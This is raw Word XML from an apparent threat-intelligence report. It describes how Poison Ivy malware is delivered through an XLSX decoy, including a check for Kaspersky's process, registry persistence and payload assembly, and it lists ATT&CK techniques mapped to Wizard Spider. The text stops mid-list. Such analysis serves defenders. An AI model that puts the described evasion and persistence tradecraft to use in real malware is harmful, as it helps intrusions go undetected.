        <w:t>Delivered Payload – Poison Ivy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C479383" w14:textId="3BEF39FA" w:rsidR="00A56237" w:rsidRDefault="00A56237" w:rsidP="00A56237">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>[1] The shellcode will move the decoy document to the location of the originally executed XLSX file and will create the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F2F072" w14:textId="77777777" w:rsidR="00A56237" w:rsidRDefault="00A56237" w:rsidP="00A56237">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> /c start excel /</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>e  “</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>&lt;path to original XLSX file, now decoy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F9F0DC" w14:textId="638FFCBE" w:rsidR="00A56237" w:rsidRDefault="00A56237" w:rsidP="00A56237">
      <w:r>
        <w:t>document&gt;”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DFE575" w14:textId="4849515C" w:rsidR="00A56237" w:rsidRDefault="00A56237" w:rsidP="00A56237">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="00A56237">
        <w:t>Before running the above command to open the decoy document, the shellcode enumerates the running processes on the system, specifically looking for processes created for an executable with a filename that starts with “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A56237">
        <w:t>avp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A56237">
        <w:t>.”, presumably in an attempt to find Kaspersky’s antivirus process. If the process is found, the shellcode will not open the decoy document and exits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC31069" w14:textId="4D46ADD0" w:rsidR="003777B8" w:rsidRDefault="003777B8" w:rsidP="00A56237">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="003777B8">
        <w:t>The shellcode does not launch the payload, rather it relies on the registry key it created for persistence to execute the payload when the user reboots the system, meaning during dynamic analysis the execution of the payload may be missed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B86E4FF" w14:textId="57F8EE17" w:rsidR="003777B8" w:rsidRDefault="003777B8" w:rsidP="00A56237">
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:r w:rsidRPr="003777B8">
        <w:t>When the system starts up, the persistence registry key will launch the Identities.ocx payload and call its “SSSS” exported function. The “SSSS” function checks to make sure that the DLL is running within the context of a “rundll32.exe” process and then begins piecing 0x141B bytes of data together in the correct order to build the shellcode of the Poison Ivy Trojan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D2C186" w14:textId="4756EB00" w:rsidR="002D640B" w:rsidRDefault="002D640B" w:rsidP="00A56237"/>
    <w:p w14:paraId="6C82371D" w14:textId="5F7EC23D" w:rsidR="002D640B" w:rsidRDefault="002D640B" w:rsidP="00A56237">
      <w:r>
        <w:t>The reports provided do not detail the exact actions taken by the attacker so an example is provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377399FA" w14:textId="3B21B700" w:rsidR="00665981" w:rsidRPr="00665981" w:rsidRDefault="00665981" w:rsidP="00A56237">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[9] Indicates that Poison Ivy uses an encrypted C2 Channel </w:t>
      </w:r>
      <w:r w:rsidRPr="00665981">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1573.001 Encrypted Channel: Symmetric Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0502B" w14:textId="6F51E31A" w:rsidR="00891095" w:rsidRPr="002E22D8" w:rsidRDefault="00891095" w:rsidP="002E22D8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="082E9D8E" w14:textId="4F6E4C19" w:rsidR="001358D1" w:rsidRDefault="001358D1" w:rsidP="00AE2F9D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc110935542"/>
      <w:bookmarkStart w:id="139" w:name="_Toc153480908"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Wizard Spider</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="65B6BC54" w14:textId="77777777" w:rsidR="00392096" w:rsidRPr="005B4630" w:rsidRDefault="00392096" w:rsidP="00392096">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="140" w:name="_Toc153480909"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="7A2C3747" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="006C2E7B" w:rsidRDefault="006C2E7B" w:rsidP="006C2E7B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0102 - Wizard Spider is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D51A8F7" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="006C2E7B" w:rsidRDefault="006C2E7B" w:rsidP="006C2E7B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is Unknown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CBBD1D" w14:textId="77777777" w:rsidR="006C2E7B" w:rsidRPr="006C2E7B" w:rsidRDefault="006C2E7B" w:rsidP="006C2E7B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is RU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7322A98B"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CF398D"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development ['T1588.002', 'T1588.003']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDF9A09"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T1588.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10250D82"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T1588.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Obtain Capabilities&gt;:Code Signing Certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7883FD94"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1133', 'T1078.002', 'T1566.002', 'T1078', 'T1566.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA4104C"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0312256E"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A329D23"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C3400E"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D18A1"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FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1566.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65268D29"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1569.002', 'T1059.003', 'T1204.001', 'T1047', 'T1059.001', 'T1053.005', 'T1204.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13025256"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T1569.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;System Services&gt;:Service Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D6B0F"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A0F2AC"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438A6A41"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1047 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows Management Instrumentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B1B2D"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FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1059.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEE65D7"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FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C5B070"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FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1204.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290E8F88"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0003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Persistence ['T1547.004', 'T1133', 'T1078.002', 'T1547.001', 'T1078', 'T1543.003', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA51BE4"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T1547.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Helper DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2BB83F"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1133 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> External Remote Services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B480821"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356C9927"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C4BBB"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E32013F"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66D68E"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FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t>T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00FC79E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0741EB6B"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0004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Privilege Escalation ['T1547.004', 'T1078.002', 'T1547.001', 'T1055.001', 'T1078', 'T1543.003', 'T1053.005']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F11595"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T1547.004 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Helper DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D5A0F6"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438CE12C"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T1547.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Boot or Logon </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Autostart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution&gt;:Registry Run Keys / Startup Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA72CBB"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T1055.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Process Injection&gt;:Dynamic-link Library Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6BA9F2"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1078 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4363829A"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T1543.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C2E7B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
